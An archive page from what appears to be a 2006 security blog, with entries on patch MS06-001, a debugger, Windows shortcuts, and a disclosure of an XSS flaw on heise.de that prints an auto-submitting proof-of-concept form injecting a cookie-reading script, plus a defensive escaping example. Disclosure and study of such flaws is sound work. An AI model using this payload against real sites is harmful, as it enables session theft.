morph3us.org

Entries from January 2006

MS06-001

  (Friday, January 6. 2006)
Patch it baby, patch it.

Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
Download M$06-001

XSS on heise.de

  (Tuesday, January 3. 2006)
heise.de - a German news site for, amongst others, security-related topics - is vulnerable to XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:
<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26
Hello Mr. Waldegger,

thank you very much for your report. Because of the holidays, the fix unfortunately took a little longer.

Kind regards
heise online
Webmaster
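
Why the PoC payload escapes the form field, and what the server-side fix looks like, as an added example that is not part of the original post or of heise's code. It assumes the registration page echoed submitted fields back into value="..." attributes; the template and the names render_unsafe, render_safe and parse_form are hypothetical.

```python
import html
from html.parser import HTMLParser

# Field names come from the PoC form; the server-side template is an assumption.
FIELDS = ("uid", "vorname", "name")
ROW = '<input type="text" name="%s" size="20" value="%s">'

def render_unsafe(params):
    """Echo submitted values into value="..." as-is (the flawed pattern)."""
    return "\n".join(ROW % (f, params.get(f, "")) for f in FIELDS)

def render_safe(params):
    """Same form, with every value HTML-encoded for a quoted attribute."""
    return "\n".join(
        ROW % (f, html.escape(params.get(f, ""), quote=True)) for f in FIELDS
    )

class FormAudit(HTMLParser):
    """Records the tags a parser sees and the value of each input."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            attrs = dict(attrs)
            self.values[attrs.get("name")] = attrs.get("value")

def parse_form(markup):
    """Parse rendered markup and return (tags seen, input values by name)."""
    audit = FormAudit()
    audit.feed(markup)
    audit.close()
    return audit.tags, audit.values

if __name__ == "__main__":
    # Constructed request body using the payload string from the PoC.
    payload = '"><script>alert(document.cookie)</script>'
    params = {"uid": "", "vorname": payload, "name": payload}
    for render in (render_unsafe, render_safe):
        tags, values = parse_form(render(params))
        print(render.__name__, tags.count("script"), repr(values["vorname"]))
```

In the unencoded rendering the parser sees two script elements and an empty vorname value; in the encoded rendering it sees only the three inputs, and the payload comes back as inert field text.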

Obsidian

  (Tuesday, January 3. 2006)
Obsidian is a so-called non-intrusive debugger for NT systems. It does not use the Win32 Debugging API for debugging, so it can attach to and detach from a running process transparently; normally a process dies along with the debugger. Check out Obsidian: deneke.biz for further details.

Related work:
Gemini Lite: A Non-intrusive Debugger for Windows NT

Some Windoze commands/shortcuts you may not know..

  (Tuesday, January 3. 2006)
Shortcuts for command prompt:
UP/DOWN ARROWS            Recall commands
ESC                       Clears command line 
F7                        Displays command history
ALT+F7                    Clears command history
F8                        Searches command history
F9                        Selects a command by number
ALT+F10                   Clears macro definitions
